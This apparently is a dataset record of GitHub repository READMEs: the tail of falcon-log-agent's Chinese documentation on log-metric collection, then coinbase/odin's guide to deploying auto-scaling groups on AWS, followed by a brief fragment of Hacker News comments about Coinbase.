d1\u9001\u961f\u5217\u7684\u65f6\u95f4\npush_url\uff1a\u63a8\u9001\u7684odin-agent\u7684url\n```\n\n**\u8d44\u6e90\u9650\u5236**\n```\nmax_cpu_rate:\u6700\u5927\u4f7f\u7528\u7684cpu\u767e\u5206\u6bd4\u3002\uff08\u53ef\u7528\u6838\u6570=ceil(\u603b\u6838\u6570*max_cpu_rate))\nmax_mem_rate:\u6700\u5927\u4f7f\u7528\u5185\u5b58\u767e\u5206\u6bd4\u3002(\u6700\u5927\u5185\u5b58=(\u5185\u5b58\u603b\u5927\u5c0f*max_mem_rate)\uff0c\u6700\u5c0f\u4e3a500M)\n```\n\n**\u7b56\u7565\u76f8\u5173**\n```\nupdate_duration:\u7b56\u7565\u7684\u66f4\u65b0\u5468\u671f\ndefault_degree:\u9ed8\u8ba4\u7684\u91c7\u96c6\u7cbe\u5ea6\n```\n\n**\u5176\u4ed6**\n```\nhttp_port:\u81ea\u8eab\u72b6\u6001\u5bf9\u5916\u66b4\u9732\u7684\u63a5\u53e3\nendpoint:\u4e0a\u62a5\u81f3open-falcon\u7684endpoint\u914d\u7f6e\u3002(\u53ef\u9009host\u6216ip,host\u4e3a\u4e3b\u673a\u540d,ip\u4e3a\u672c\u673aip)\n```\n\n# \u91c7\u96c6\u7b56\u7565\n\n## \u6587\u4ef6\u8def\u5f84\n\n\u6587\u4ef6\u8def\u5f84\uff0c\u5373file_path\u914d\u7f6e\u9879\u3002**\u5fc5\u987b\u8981\u6c42\u542f\u52a8agent\u7684\u7528\u6237\uff0c\u5bf9\u8fd9\u4e2a\u6587\u4ef6\u6709\u53ef\u8bfb\u6743\u9650**\u3002\n\n\u6587\u4ef6\u8def\u5f84\u652f\u6301\u56fa\u5b9a\u8def\u5f84\u548c\u52a8\u6001\u8def\u5f84\u4e24\u79cd\uff1a\n- \u56fa\u5b9a\u8def\u5f84\uff1a\u76f4\u63a5\u586b\u5199\u5373\u53ef\uff0c\u5982/var/log/falcon-log-agent.log\n- \u52a8\u6001\u8def\u5f84\uff1a\u53ef\u652f\u6301\u6309\u7167\u89c4\u5219\u914d\u7f6e\u7684\u6839\u636e\u65f6\u95f4\u53d8\u5316\u7684\u8def\u5f84\u3002\u4f8b\u5982\uff1a\n\n```\n\u6bd4\u5982\uff1a\u7ebf\u4e0a\u6709\u4e9b\u6a21\u5757\u81ea\u5df1\u6309\u7167\u5c0f\u65f6\u5199\u5165\u6587\u4ef6\uff0c\u8def\u5f84\u4e3a\uff1a\n/xiaoju/application/log/20150723/application.log.2015072312\n \n\u5bf9\u5e94\u7684\u6211\u4eec\u7684\u914d\u7f6e\u65b9\u5f0f\u53ef\u4ee5\u586b\u5199\u4e3a\uff1a\n/xiaoju/application/log/${%Y%m%d}/application.log.${%Y%m%d%H} // ${}\u4e2d\u4e0d\u80fd\u5305\u542b/\n```\n\n## 
\u65f6\u95f4\u683c\u5f0f\n\n\u65f6\u95f4\u683c\u5f0f\uff0c\u5373time_format\u914d\u7f6e\u9879\u3002\n\n\u5982\u679c\u65e5\u5fd7\u4e2d\u6ca1\u6709\u65f6\u95f4\u683c\u5f0f\uff0c\u4e00\u65e6\u9047\u5230\u65e5\u5fd7\u5ef6\u8fdf\u843d\u76d8\u3001\u6216\u8005\u65e5\u5fd7\u91cf\u592a\u5927\u8ba1\u7b97\u5ef6\u8fdf\u7684\u60c5\u51b5\u3002\u4f1a\u76f4\u63a5\u5bfc\u81f4\u6211\u4eec\u7684\u76d1\u63a7\u91c7\u96c6\u4e0d\u51c6\u3002\n\n\u56e0\u6b64\uff0c\u6211\u4eec\u89c4\u5b9a\u65e5\u5fd7\u4e2d\u5fc5\u987b\u6709\u5408\u6cd5\u7684\u65f6\u95f4\u683c\u5f0f\u3002\u4e14\u5728\u914d\u7f6e\u4e2dtime_format\u9879\u6307\u5b9a\u3002\n\n\u5982\u679c\u60f3\u8981\u6dfb\u52a0\u81ea\u5df1\u7684\u65f6\u95f4\u683c\u5f0f\uff0c\u53ef\u4ee5\u76f4\u63a5\u5728[common/utils/util.go](https://github.com/didi/falcon-log-agent/blob/master/src/common/utils/util.go)\u91cc\u6dfb\u52a0\u3002\n\n\u76ee\u524d\u5df2\u7ecf\u652f\u6301\u7684\u65f6\u95f4\u683c\u5f0f\u5982\u4e0b\uff1a\n```\ndd/mmm/yyyy:HH:MM:SS\ndd/mmm/yyyy HH:MM:SS\nyyyy-mm-ddTHH:MM:SS\ndd-mmm-yyyy HH:MM:SS\nyyyy-mm-dd HH:MM:SS\nyyyy/mm/dd HH:MM:SS\nyyyymmdd HH:MM:SS\nmmm dd HH:MM:SS\n\nPS\uff1a\u4e3a\u4e86\u9632\u6b62\u65e5\u5fd7\u79ef\u538b\u6216\u6027\u80fd\u4e0d\u8db3\u5bfc\u81f4\u7684\u8ba1\u7b97\u504f\u5dee\uff0c\u65e5\u5fd7\u91c7\u96c6\u7684\u8ba1\u7b97\uff0c\u4f9d\u8d56\u4e8e\u65e5\u5fd7\u7684\u65f6\u95f4\u6233\u3002\n\u56e0\u6b64\u5982\u679c\u914d\u7f6e\u4e86\u9519\u8bef\u7684\u65f6\u95f4\u683c\u5f0f\uff0c\u5c06\u65e0\u6cd5\u5f97\u5230\u6b63\u786e\u7684\u7ed3\u679c\u3002\n```\n\n## \u91c7\u96c6\u89c4\u5219\n\n\u91c7\u96c6\u6b63\u5219\uff0c\u5305\u542b\u4e24\u4e2a\u914d\u7f6e\u9879\uff1apattern\u548cexclude\u3002\n\n\u4e24\u4e2a\u91c7\u96c6\u9879\u90fd\u662f\u6b63\u5219\u8868\u8fbe\u5f0f\uff0c\u6b63\u5219\u8868\u8fbe\u5f0f\u7684\u652f\u6301\u60c5\u51b5\u89c1\uff1a[google/re2](https://github.com/google/re2/wiki/Syntax)\n\npattern\u4ee3\u8868\u9700\u8981\u5b8c\u5168\u5339\u914d\u51fa\u6765\u7684\u8868\u8fbe\u5f0f\u3002\n\nexclude\u4ee3\u8868\u9700\u8981\u6392\u9664\u6389\u7684\u8868\u8fbe\u5f0f\u3002\n\n```\neg. 
\u4f8b\u5982\uff0c\u6211\u5e0c\u671b\u7edf\u8ba1code=500\u6216400\u7684\u65e5\u5fd7\u6570\u91cf\uff0c\u4f46\u662f\u60f3\u6392\u9664\u6389\u5173\u952e\u5b57SpeciallyErrorNo\u3002 \u914d\u7f6e\u5982\u4e0b\uff1a\n\npattern: code=[45]00\nexclude: SpeciallyErrorNo\n```\n\n## \u91c7\u96c6\u5468\u671f\n\n\u91c7\u96c6\u5468\u671f(step)\uff0c\u5bf9\u5e94\u7740\u76d1\u63a7\u7cfb\u7edf\u7684\u4e0a\u62a5\u5468\u671f\u3002\u610f\u5473\u7740\u591a\u4e45\u5408\u5e76\u4e0a\u62a5\u4e00\u6b21\u3002\n```\n\u5047\u8bbe\u6bcf\u79d2\u4ea7\u751f1\u6761\u7b26\u5408\u91c7\u96c6\u89c4\u5219\u7684\u65e5\u5fd7\uff0c\u914d\u7f6e\u7684\u91c7\u96c6\u65b9\u5f0f\u4e3a\u8ba1\u6570\u3002\n\u5982\u679cstep\u4e3a10 : \u5219\u6bcf10s\u4e0a\u62a5\u4e00\u6b21\uff0c\u503c\u4e3a10\n\u5982\u679cstep\u4e3a60 : \u5219\u6bcf60s\u4e0a\u62a5\u4e00\u6b21\uff0c\u503c\u4e3a60\n```\n\n## \u91c7\u96c6\u65b9\u5f0f\n\n\u91c7\u96c6\u65b9\u5f0f(func)\u7684\u610f\u601d\u662f\uff0c\u5f53\u6211\u4eec\u4ece\u65e5\u5fd7\u4e2d\u7b5b\u9009\u51fa\u4e00\u5806\u7b26\u5408\u89c4\u5219\u7684\u65e5\u5fd7\u4e4b\u540e\uff0c\u5e94\u8be5\u4ee5\u54ea\u79cd\u89c4\u5219\u6765\u8ba1\u7b97\u62ff\u5230\u6700\u540e\u7684\u503c\u6765\u4e0a\u62a5\u3002\n\n\u76ee\u524d\u652f\u6301\u7684\u91c7\u96c6\u65b9\u5f0f\u6709\uff1a\n- cnt\n- avg\n- sum\n- max\n- min\n\n\u4e3e\u4f8b\uff1a\n```\n\u5047\u8bbe\uff1a\n\u6b63\u5219\u8868\u8fbe\u5f0f\u914d\u7f6e\u4e3a Return Success : (\\d+)s Used\n \n\u67d0\u4e00\u4e2a\u5468\u671f\u5185\u65e5\u5fd7\u6eda\u52a8\uff1a\n2017/12/01 12:12:01 Return Success : 1s Used\n2017/12/01 12:12:02 Return Success : 2s Used\n2017/12/01 12:12:03 Return Success : 4s Used\n2017/12/01 12:12:04 Return Success : 2s Used\n2017/12/01 12:12:05 Return Success : 1s Used\n \n\u9996\u5148\uff0c\u6839\u636e\u6b63\u5219\u83b7\u53d6\u5230\u62ec\u53f7\u5185\u7684\u503c\uff1a1\u30012\u30014\u30012\u30011\n\u63a5\u4e0b\u6765\uff0c\u6839\u636e\u4e0d\u540c\u7684\u8ba1\u7b97\u65b9\u5f0f\uff0c\u4f1a\u5f97\u5230\u4e0d\u540c\u7684\u7ed3\u679c\uff1a\navg : (1 + 2 + 4 + 2 + 1) / 5 = 2\ncount : 5\nsum : (1 + 2 + 4 + 2 + 1) = 10\nmax : Max(1, 2, 4, 2, 1) = 4\nmin : Min(1, 2, 4, 2, 1) = 1\n```\n\n## \u91c7\u96c6\u540d\u79f0\n\n**\u91c7\u96c6\u540d\u79f0**(name)\u5bf9\u5e94open-falcon\u4e2d\u7684metric\uff0c\u5373\u76d1\u63a7\u9879\u3002\n\n## \u6807\u7b7e\n\n**\u6807\u7b7e**(tags)\u4e0eopen-falcon\u4e2d\u7684tags\u76f8\u5bf9\u5e94\u3002\u53ef\u4ee5\u7406\u89e3\u4e3a\u786e\u5b9a\u76d1\u63a7\u9879\u7684\u8865\u5145\u3002\n```\n\u8bf4\u660e\uff1a\u673a\u5668A\u7684\u7b2c\u4e00\u4e2a\u6838\u7684cpu\u7a7a\u95f2\u7387\u3002\n\n\u91c7\u96c6\u540d\u79f0(metric): cpu\u7a7a\u95f2\u7387(cpu.idle)\n\u6807\u7b7e(tags)\uff1a\u4e24\u4e2a\u6807\u7b7e: host=\u673a\u5668A;\u6838\u6570=\u7b2c\u4e00\u4e2a\u6838\n```\n\u5728\u4e3b\u6b63\u5219\u5339\u914d\u5b8c\u6210\u540e\uff0c\u7136\u540e\u5339\u914d\u51fatag\u7684\u503c\uff0c\u4e00\u8d77\u8fdb\u884c\u4e0a\u62a5\u3002\n\n\u82e5\u65e0\u6cd5\u5339\u914d\u51fatag\u7684\u503c\uff0c\u5219\u89c6\u4e3a\u8be5\u6761\u6570\u636e\u672a\u5339\u914d\u5230\uff0c\u8be5\u6761\u65e5\u5fd7\u5c06**\u4e0d\u518d\u8ba1\u5165\u7edf\u8ba1**\u3002\n\n## \u5176\u4ed6\n\n- degree: \u7cbe\u5ea6\n- comment: \u5907\u6ce8\n\n# 
\u68c0\u9a8c\u65e5\u5fd7\u683c\u5f0f\n\u542f\u52a8agent\uff0c\u4f1a\u81ea\u52a8\u52a0\u8f7d\u6240\u6709\u7b56\u7565\u3002\u6b64\u65f6\u901a\u8fc7**/check**\u63a5\u53e3\uff0c\u53ef\u4ee5\u5b9e\u65f6\u9a8c\u8bc1\u65e5\u5fd7\u662f\u5426\u53ef\u4ee5\u5339\u914d\u5230\u7b56\u7565\u3002\n/check\u63a5\u53e3\u4f1a\u5c06\u8be5\u6761\u65e5\u5fd7\u80fd\u547d\u4e2d\u7684\u91c7\u96c6\u89c4\u5219\uff0c\u4e00\u8d77\u8fd4\u56de\uff0c\u5e76\u8fd4\u56de\u547d\u4e2d\u8be6\u60c5\u3002\n```\n\u65b9\u6cd5\uff1aPOST\n\u53c2\u6570\uff1alog=${\u65e5\u5fd7\u539f\u6587} // postForm\n\neg.\ncurl -s -XPOST localhost:8003/check -d 'log=01/Jan/2018:12:12:12 service error 500, num=10 province=33' | python -m json.tool\n```\n\n\n# \u81ea\u8eab\u72b6\u6001\u66b4\u9732\nfalcon-log-agent\u672c\u8eab\u5bf9\u5916\u63d0\u4f9b\u4e86\u4e00\u4e2ahttp\u670d\u52a1\u7528\u6765\u66b4\u9732\u81ea\u8eab\u72b6\u6001\u3002\n\n\u4e3b\u8981\u63d0\u4f9b\u7684url\u5982\u4e0b\uff1a\n- /health \uff1a \u81ea\u8eab\u5b58\u6d3b\u72b6\u6001\n- /strategy \uff1a\u5f53\u524d\u751f\u6548\u7684\u7b56\u7565\u5217\u8868\n- /cached \uff1a \u6700\u8fd11min\u5185\u4e0a\u62a5\u7684\u70b9\n\n\n# \u81ea\u76d1\u63a7\n\u5728[common/proc/metric/metric.go](https://github.com/didi/falcon-log-agent/blob/master/common/proc/metric/metric.go#L38)\u5b9a\u4e49\u4e86\u4e00\u4e2a\u81ea\u76d1\u63a7\u7ed3\u6784\u4f53\u3002\n\n\u5728\u7a0b\u5e8f\u8fd0\u884c\u8fc7\u7a0b\u4e2d\u4f1a\u4e0d\u65ad\u6536\u96c6\u4fe1\u606f\uff0c\u4e3b\u8981\u5305\u62ec\u5982\u4e0b\uff1a\n```\nMemUsedMB \u8fdb\u7a0b\u5185\u5b58\u5360\u7528\nReadLineCnt \u8bfb\u65e5\u5fd7\u884c\u6570\nDropLineCnt \u961f\u5217\u6253\u6ee1\u540e\uff0c\u6254\u6389\u7684\u65e5\u5fd7\u884c\u6570\nAnalysisCnt \u5206\u6790\u5b8c\u6210\u7684\u65e5\u5fd7\u884c\u6570\nAnalysisSuccCnt \u5206\u6790\u6210\u529f\u5339\u914d\u7684\u65e5\u5fd7\u884c\u6570\nPushCnt \u63a8\u9001\u7684\u76d1\u63a7\u6570\u636e\u70b9\u6570\nPushErrorCnt \u63a8\u9001\u9519\u8bef\u7684\u76d1\u63a7\u6570\u636e\u70b9\u6570\nPushLatency \u63a8\u9001\u76d1\u63a7\u6570\u636e\u5ef6\u8fdf\n```\n\u8fd9\u4e9b\u6570\u636e\uff0c\u76ee\u524d\u81ea\u76d1\u63a7\u7684\u5904\u7406\u65b9\u5f0f\u662f\uff1a\u5b9a\u65f6\u8f93\u51fa\u65e5\u5fd7\u3002\n\n\u5982\u679c\u9700\u8981\u5bf9\u63a5\u81ea\u5df1\u516c\u53f8\u7684\u76d1\u63a7\u7cfb\u7edf\uff0c\u5728[common/proc/metric/metric.go](https://github.com/didi/falcon-log-agent/blob/master/common/proc/metric/metric.go#L81)\u4fee\u6539HandleMetrics\u65b9\u6cd5\u5373\u53ef\u3002\n\n# \u8d21\u732e\u8005\n- [**\u9ad8\u5bb6\u5347**](https://github.com/GaoJiasheng)\n- [**\u5b89\u5b9d\u52c7**](https://github.com/anbaoyong)\n- [wcc526](https://github.com/wcc526)\n- [mdh67899](https://github.com/mdh67899)\n- [1Feng](https://github.com/1Feng)\n\n\n## Contributors\n\nThis project exists thanks to all the people who contribute. \n\n\n\n## Backers\n\nThank you to all our backers! \ud83d\ude4f [[Become a backer](https://opencollective.com/falcon-log-agent#backer)]\n\n\n\n\n## Sponsors\n\nSupport this project by becoming a sponsor. Your logo will show up here with a link to your website. 
[[Become a sponsor](https://opencollective.com/falcon-log-agent#sponsor)]\n\n\n\n\n\n\n\n\n\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "coinbase/odin", "link": "https://github.com/coinbase/odin", "tags": [], "stars": 536, "description": "Archived: Odin deployer to AWS for 12 Factor applications.", "lang": "Go", "repo_lang": "", "readme": "# Odin Auto-Scaling Group Deployer\n\n\"Odin\"\n\nDeploy your [12-factor-applications](https://12factor.net/) to AWS easily and securely with the Odin. Odin is a AWS [Step Function](https://docs.aws.amazon.com/step-functions/latest/dg/welcome.html) base on the [`step`](https://github.com/coinbase/step) framework that deploys services as [Auto-Scaling Groups](https://docs.aws.amazon.com/autoscaling/ec2/userguide/what-is-amazon-ec2-auto-scaling.html) (ASG's) to AWS.\n\nOdin's goals/requirements/features are:\n\n1. **Ephemeral Blue/Green**: create new instances, wait for them to become healthy, delete old instances; treating compute instances as disposable and ephemeral.\n1. **Declarative**: describe what a successful release looks like, not how to deploy it.\n1. **Scalable**: can scale both vertically (larger instances) and horizontally (more instances).\n1. **Secure**: resources are verified to ensure that they cannot be used accidentally or maliciously.\n1. **Gracefully Fail**: handle failures to recover and roll back with no/minimal impact to users.\n1. **Configuration Parity**: minimize divergence between production, staging and development environments by keeping releases as similar as possible.\n1. **No Configuration**: once Odin is deployed it requires no further configuration.\n1. **Multi Account**: one deployer for all AWS accounts.\n\n### Getting Started\n\nOdin is implemented as an [AWS Lambda Function](https://docs.aws.amazon.com/lambda/latest/dg/welcome.html) and [AWS Step Function](https://docs.aws.amazon.com/step-functions/latest/dg/welcome.html) that deploys by assuming a role into an AWS account. You can bootstrap these into AWS with:\n\n```bash\ngit pull # pull down new code\n./scripts/bootstrap\n```\n\n#### Testing with deploy-test\n\nOdin includes a test project `deploy-test` that has one service `web` that starts an nginx server to be mounted behind a [Elastic Load Balancer](https://aws.amazon.com/elasticloadbalancing/) (ELB) and [Application Load Balancer](https://docs.aws.amazon.com/elasticloadbalancing/latest/application/introduction.html) target group. 
The service instances have a [security group](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html) and [instance profile](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html).\n\nTo create the AWS resources for `deploy-test`:\n\n```bash\n./scripts/geo apply resources/deploy-test-resources.rb\n```\n\n*Note: you will also have to tag the latest Ubuntu release with `Name: ubuntu` and `DeployWith: odin`*\n\nA `deploy-test` release file `deployer-test-release.json` looks like:\n\n```yaml\n{\n \"project_name\": \"coinbase/deploy-test\",\n \"config_name\": \"development\",\n \"subnets\": [\"test_private_subnet_a\", \"test_private_subnet_b\"],\n \"ami\": \"ubuntu\",\n \"services\": {\n \"web\": {\n \"instance_type\": \"t2.nano\",\n \"security_groups\": [\"ec2::coinbase/deploy-test::development\"],\n \"elbs\": [\"coinbase-deploy-test-web-elb\"],\n \"profile\": \"coinbase-deploy-test\",\n \"target_groups\": [\"coinbase-deploy-test-web-tg\"]\n }\n }\n}\n```\n\nThe user data for the release is from the file `deployer-test-release.json.userdata`:\n\n```yaml\n#cloud-config\nrepo_update: true\nrepo_upgrade: all\n\npackages:\n - docker.io\n\nruncmd:\n - docker run -d -p 8000:80 nginx\n```\n\nTo build a release for `deploy-test` and send it to Odin we use the `odin` executable:\n\n```bash\nodin deploy deploy-test-release.json\n```\n\n\"Odin\n\nThe `odin` executable takes the release file, merges in the user data, attaches some meta-data like `created_at` and `release_id`, then sends the release to the Odin step function that:\n\n1. validates the sent release and any referenced resources.\n1. creates a new auto-scaling group for `web` that starts an nginx server.\n1. waits for the EC2 instances in the `web` ASG to become healthy w.r.t. the ASG, the ELB and the target group. This may take a few minutes.\n1. once healthy, deletes the ASGs from the previous release and terminates their instances.\n\nThis is the **ephemeral blue/green** where old instances are deleted and new servers created.\n\n### Odin Release\n\nAn Odin release is a request to deploy a **Project-Configuration** where:\n\n* A **Project** is a code-base typically named with `org/name`.\n* A **Configuration** is the environment the project is being deployed into, e.g. `development`, `production`.\n\nEach release can define 1-to-many **Services**; each service is a logical group of servers, e.g. `web` or `worker`, that maps to a single auto-scaling group (ASG).\n\nWhen Odin is sent a release, it moves it through a state machine:\n\n\"odin\n\n1. **Validate**: validate the release is correct.\n1. **Lock**: grabs a lock on the project-configuration.\n1. **ValidateResources**: validate resources w.r.t. the project, configuration and service using them.\n1. **Deploy**: creates an ASG and other resources for each service.\n1. **CheckHealthy**: check to see if the new instances created are healthy w.r.t. their ASGs, ELBs and target groups. If instances are seen to be terminating, immediately halt the release.\n1. **CleanUpSuccess**: if the release was a success, then delete the old ASGs.\n1. **CleanUpFailure**: if the release failed, delete the new ASGs.\n1. **ReleaseLockFailure**: try to release the lock and fail.\n\nAt each of these states it is possible to fail and then move towards a failure state. 
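To see which state a failed release died in, the standard AWS Step Functions API can be queried directly. This is a minimal sketch rather than an `odin` subcommand; the state machine ARN and region below are placeholders:\n\n```bash\n# List recent failed Odin executions (replace the ARN with your Odin state machine)\naws stepfunctions list-executions --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:odin --status-filter FAILED\n\n# Walk the per-state history of one execution to find the state that failed\naws stepfunctions get-execution-history --execution-arn <execution-arn>\n```\n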
The typical failures are:\n\n* **BadReleaseError**: The release sent was invalid because either its structure was incorrect, its values were invalid, or its resources were invalid.\n* **LockExistsError**: Could not grab the lock because either another deploy for the project-configuration is currently going out, or a previous deploy left a lock in place.\n* **DeployError**: Unable to create a new ASG or resource.\n* **HaltError**: Halt was detected or instances were found terminating.\n* **TimeoutError**: The deploy took too long and failed.\n\nThe end states are:\n\n1. **Success**: the release went as planned.\n2. **FailureClean**: release was unsuccessful, but cleanup was successful, so AWS was left in a good state.\n3. **FailureDirty**: release was unsuccessful, and cleanup failed, so AWS was left in a bad state. This should never happen; alert if it does and file a bug.\n4. It is possible to not end in one of these states if the state machine is incorrect. **This is very bad**; alert if this happens and file a bug.\n\n#### Resources\n\nA release uses resources that must exist and be configured correctly to be used for the project-configuration-service being deployed.\n\nA release **must** have:\n\n1. an **AMI** defined with the `ami` key that can be either a `Name` tag or an AMI ID, e.g. `ami-1234567`\n2. **Subnets** defined with the `subnets` key, a list of either `Name` tags or Subnet IDs, e.g. `subnet-1234567`\n\nBoth the above resources **MUST** have a tag `DeployWith` that equals `odin`.\n\nServices **can** have:\n\n1. **Security Groups** defined with the `security_groups` key, a list of security group `Name` tags\n2. **Elastic Load Balancers** defined with the `elbs` key, a list of ELB names\n3. **Application Load Balancer Target Groups** defined with the `target_groups` key, a list of target group `Name` tags\n\nAll the above resources **MUST** be tagged with the `ProjectName`, `ConfigName` and `ServiceName` of the release to ensure that resources are assigned correctly.\n\nServices can also have an **Instance Profile** defined by the `profile` key that is an instance profile `Name` tag. The role's path **MUST** be equal to `////`.\n\n#### Scale\n\nOdin makes it easy to scale both vertically and horizontally. 
To scale `deploy-test` we add to the release:\n\n```yaml\n{ ...\n \"services\": {\n \"web\": { ...\n \"instance_type\": \"c4.xlarge\",\n \"ebs_volume_size\": 20,\n \"ebs_volume_type\": \"gp2\",\n \"ebs_device_name\": \"/dev/sda1\",\n \"autoscaling\": {\n \"min_size\": 3,\n \"max_size\": 5,\n \"spread\": 0.2,\n \"max_terms\": 1,\n \"policies\": [\n {\n \"type\": \"cpu_scale_up\",\n \"threshold\" : 25,\n \"scaling_adjustment\": 2\n },\n {\n \"type\": \"cpu_scale_down\",\n \"threshold\" : 15,\n \"scaling_adjustment\": -1\n }\n ]\n }\n }\n }\n}\n```\n\n* `instance_type` is the [EC2 instance type](https://www.ec2instances.info/) for the service\n* `ebs_volume_size` (in GB), `ebs_volume_type` and `ebs_device_name` define the attached [EBS volume](https://aws.amazon.com/ebs/).\n\nThe `autoscaling` key defines the horizontal scaling of a service:\n\n* all calculations are bounded by `min_size` and `max_size`.\n* the `desired_capacity` is equal to the `min_size` or the capacity of the previously launched service\n* the actual number of instances launched is `desired_capacity * (1 + spread)`\n* to be deemed healthy, the service must have at least `desired_capacity * (1 - spread)` healthy instances (e.g. with a `desired_capacity` of 10 and a `spread` of 0.2, 12 instances are launched and at least 8 must become healthy)\n* if the number of terminating instances is greater than or equal to `max_terms` (default `0`), the release is immediately halted.\n* `policies` are defined above to increase the `desired_capacity` by 2 instances if the CPU goes above 25% and reduce it by 1 instance if it drops below 15%.\n\n*Both `spread` and `max_terms` are useful when launching many instances because as scale increases the number of cloud errors increases.*\n\n#### User Data\n\n**Do not put sensitive data into user data**. User data is easily accessible from the AWS console, difficult to secure with IAM, and very [limited in size](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-add-user-data). Odin requires user data passed to it to be KMS encrypted, uploaded to S3, and a SHA256 of it to be passed in the release so it can be checked. The userdata will still be accessible in plain text on a launch configuration and EC2 instances, so these precautions are more to protect against tampering than to protect secrets.\n\nFor any secret an instance needs access to, we recommend using [Vault](https://www.vaultproject.io/), [AWS Parameter store](https://docs.aws.amazon.com/systems-manager/latest/userguide/systems-manager-paramstore.html), or [KMS encrypted S3](https://docs.aws.amazon.com/kms/latest/developerguide/services-s3.html) authenticated by a service's instance profile.\n\nThe [user data](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html) is KMS encrypted and uploaded to S3. Odin will replace some strings with information about the release, project, config and service, e.g.:\n\n```yaml\n...\nwrite_files:\n - path: /\n content: |\n {{RELEASE_ID}}\n {{PROJECT_NAME}}\n {{CONFIG_NAME}}\n {{SERVICE_NAME}}\n```\n\nOdin will replace `{{PROJECT_NAME}}` with the name of the project and `{{SERVICE_NAME}}` with the name of the service. This can be useful for getting service-specific configuration and logging.\n\nThe `odin` client will upload the user data for the services from the `.userdata` file, e.g. `deployer-test-release.json.userdata`.\n\n#### Timeout\n\nA release can have a `timeout` which is how long in seconds a release will wait for its services to become healthy. 
By default the timeout is 10 minutes; the max value is around a year (*31556926 seconds*), since that is how long a step function can run.\n\n#### Lifecycle\n\nAWS provides [Auto Scaling Group Lifecycle Hooks](https://docs.aws.amazon.com/autoscaling/ec2/userguide/lifecycle-hooks.html) to detect and react to auto-scaling events. You can add the lifecycle hooks to the ASGs with:\n\n```yaml\n{ ...\n \"lifecycle\": {\n \"termhook\" : {\n \"transition\": \"autoscaling:EC2_INSTANCE_TERMINATING\",\n \"role\": \"asg_lifecycle_hooks\",\n \"sns\": \"asg_lifecycle_hooks\",\n \"heartbeat_timeout\": 300\n }\n }\n}\n```\n\nThese can be used to gracefully shut down instances, which is necessary if a service has long-running jobs, e.g. a `worker` service.\n\n#### Halt\n\nOdin supports manually stopping a release while it is being deployed. Just execute:\n\n```\nodin halt deploy-test-release.json\n```\n\nThis will:\n\n1. Find the running deploy for the project configuration\n2. Write a `halt` file to S3\n3. Wait for Odin to detect the halt file and fail the deploy\n\nHalt does not guarantee that the release will not be deployed; if executed too late, the release may still result in success.\n\n**DO NOT** use `Stop execution` of the Odin step function as it will not clean up resources and will leave AWS in a bad state.\n\n### Security\n\nDeployers are critical pieces of infrastructure as they may be used to compromise the software they deploy. As such, we take security very seriously around `odin` and try to answer the following questions:\n\n1. *Authentication*: Who can deploy?\n2. *Authorization*: What can be deployed?\n3. *Replay* and *Man-in-the-middle (MITM)*: Can some unauthorized person edit or reuse a release to change what is deployed?\n4. *Audit*: Who has done what, and when?\n\n#### Authentication\n\nThe central authentication mechanisms are the AWS IAM permissions for step functions and S3.\n\nBy limiting the `ec2:CreateAutoscalingGroup` permission, the Odin function becomes the only way to deploy ASGs. Limiting who can call `states:StartExecution` for Odin then limits who can deploy.\n\nEnsuring that Odin's lambda can only access a single S3 bucket further limits who can deploy:\n\n```yaml\n{\n \"Effect\": \"Allow\",\n \"Action\": [\n \"s3:GetObject*\", \"s3:PutObject*\",\n \"s3:List*\", \"s3:DeleteObject*\"\n ],\n \"Resource\": [\n \"arn:aws:s3:::#{s3_bucket_name}/*\",\n \"arn:aws:s3:::#{s3_bucket_name}\"\n ]\n},\n{\n \"Effect\": \"Deny\",\n \"Action\": [\"s3:*\"],\n \"NotResource\": [\n \"arn:aws:s3:::#{s3_bucket_name}/*\",\n \"arn:aws:s3:::#{s3_bucket_name}\"\n ]\n},\n```\n\nThe Odin step function also needs to decrypt the KMS encrypted user-data that is uploaded to S3. By default it is encrypted with the `alias/aws/s3` key, but a custom KMS key can be used and either an alias or ARN can be added to `user_data_kms_key`. A custom key will give a better audit trail, and can lock down who can release even more.\n\nWho can execute the step function, and who can upload to S3, are the two permissions that guard who can deploy.\n\n#### Authorization\n\nAll resources that can be used in an Odin deploy must opt-in using tags or paths. 
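For example, opting resources in could look something like the sketch below (a hypothetical illustration using the plain AWS CLI; the subnet ID and ELB name are placeholders, while the tag keys are the ones this README requires):\n\n```bash\n# Opt a subnet in for use by Odin\naws ec2 create-tags --resources subnet-0123456789abcdef0 --tags Key=DeployWith,Value=odin\n\n# Scope an ELB to a specific project/config/service\naws elb add-tags --load-balancer-names coinbase-deploy-test-web-elb --tags Key=ProjectName,Value=coinbase/deploy-test Key=ConfigName,Value=development Key=ServiceName,Value=web\n```\n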
Additionally, service resources require specific tags or paths denoting which project/config/service can use them.\n\nAssets uploaded to S3 are in the path `//` so limiting who can `s3:PutObject` to a path can be used to limit what project-configs they can deploy or halt.\n\n#### Replay and MITM\n\nEach release the client generates a release `release_id`, a `created_at` date, and together also uploads the release to S3.\n\nThe `odin` will reject any request where the `created_at` date is not recent, or the release sent to the step function and S3 don't match. This means that if a user can invoke the step function, but not upload to S3 (or vice-versa) it is not possible to deploy old or malicious code.\n\n#### Audit\n\nWorking out what happened and when is very useful for debugging and security response. Step functions make it easy to see the history of all executions in the AWS console and via API. S3 can log all access to cloud-trail, so collecting from these two sources will show all information about a deploy.\n\n### Continuing Deployment\n\nThere is always more to do:\n\n1. Allow LifeCycle Hooks to send to Cloudwatch.\n1. Subnet, AMI, life cycle and userdata overrides per service.\n1. Check EC2 instance limits and capacity before deploying.\n1. Slowly scale (Canary) instances up rather than all at once, e.g. deploy 1 instance check it is healthy then deploy the rest.\n1. Add ELB and Target Group error rates when checking healthy.\n1. Custom auto-scaling policy types.\n\n", "readme_type": "markdown", "hn_comments": "This is a really fast route to failure. If building a bot was easy, everyone would be doing it (and successful at it).Never double down gamble when you're desperate.You kind of already touched on one of the main reasons: there\u2019s a regulatory framework in place for an IPO in their operating jurisdiction. There is still a lot of ambiguity and regulation to come for ICO\u2019s and they (rightfully) don\u2019t want to risk their company until those get ironed out.Exit liquidity. Investors cashed out as soon as Coinbase went public. They wanted their money \u201cback\u201d as legal as 